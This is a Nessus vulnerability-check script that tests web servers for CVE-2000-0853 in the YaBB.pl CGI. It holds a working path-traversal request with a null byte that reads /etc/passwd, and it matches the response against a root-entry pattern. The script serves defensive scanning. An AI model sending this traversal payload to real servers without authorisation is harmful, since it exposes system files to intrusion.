#
# This script was written by Renaud Deraison <deraison@cvs.nessus.org>
#
# See the Nessus Scripts License for details
#

if(description)
{
 script_id(10512);
 script_version ("$Revision: 1.10.2.1 $");
 script_bugtraq_id(1668);
 script_cve_id("CVE-2000-0853");
 name["english"] = "YaBB";
 name["francais"] = "YaBB";
 script_name(english:name["english"], francais:name["francais"]);
 
 desc["english"] = "The 'YaBB.pl' CGI is installed. This CGI has
a well known security flaw that lets an attacker read arbitrary
files with the privileges of the http daemon (usually root or nobody).

Solution : remove 'YaBB.pl' from /cgi-bin or upgrade to the latest version.

Risk factor : Serious";


 desc["francais"] = "Le cgi 'YaBB.pl' est install. Celui-ci possde
un problme de scurit bien connu qui permet  n'importe qui de 
faire lire des fichiers  arbitraires au daemon http, avec les privilges
de celui-ci (root ou nobody). 

Solution : retirez-le de /cgi-bin ou mettez-le  jour 

Facteur de risque : Srieux";


 script_description(english:desc["english"], francais:desc["francais"]);
 
 summary["english"] = "Checks for the presence of /cgi-bin/YaBB.pl";
 summary["francais"] = "Vrifie la prsence de /cgi-bin/YaBB.pl";
 
 script_summary(english:summary["english"], francais:summary["francais"]);
 
 script_category(ACT_GATHER_INFO);
 
 
 script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison",
		francais:"Ce script est Copyright (C) 2000 Renaud Deraison");
 family["english"] = "CGI abuses";
 family["francais"] = "Abus de CGI";
 script_family(english:family["english"], francais:family["francais"]);
 script_dependencie("find_service.nes", "no404.nasl");
 script_require_ports("Services/www", 80);
 exit(0);
}

#
# The script code starts here
#

include("http_func.inc");

port = get_kb_item("Services/www");
if(!port) port = 80;

if(get_port_state(port)){
 req = string(cgibin(), "/YaBB.pl?board=news&action=display&num=../../../../../../etc/passwd%00");
 req = http_get(item:req, port:port);
 soc = http_open_socket(port);
 send(socket:soc, data:req);
 r = http_recv(socket:soc);
 http_close_socket(soc);
 if(egrep(pattern:".*root:.*:0:0:.*", string:r))
 	security_hole(port);
}
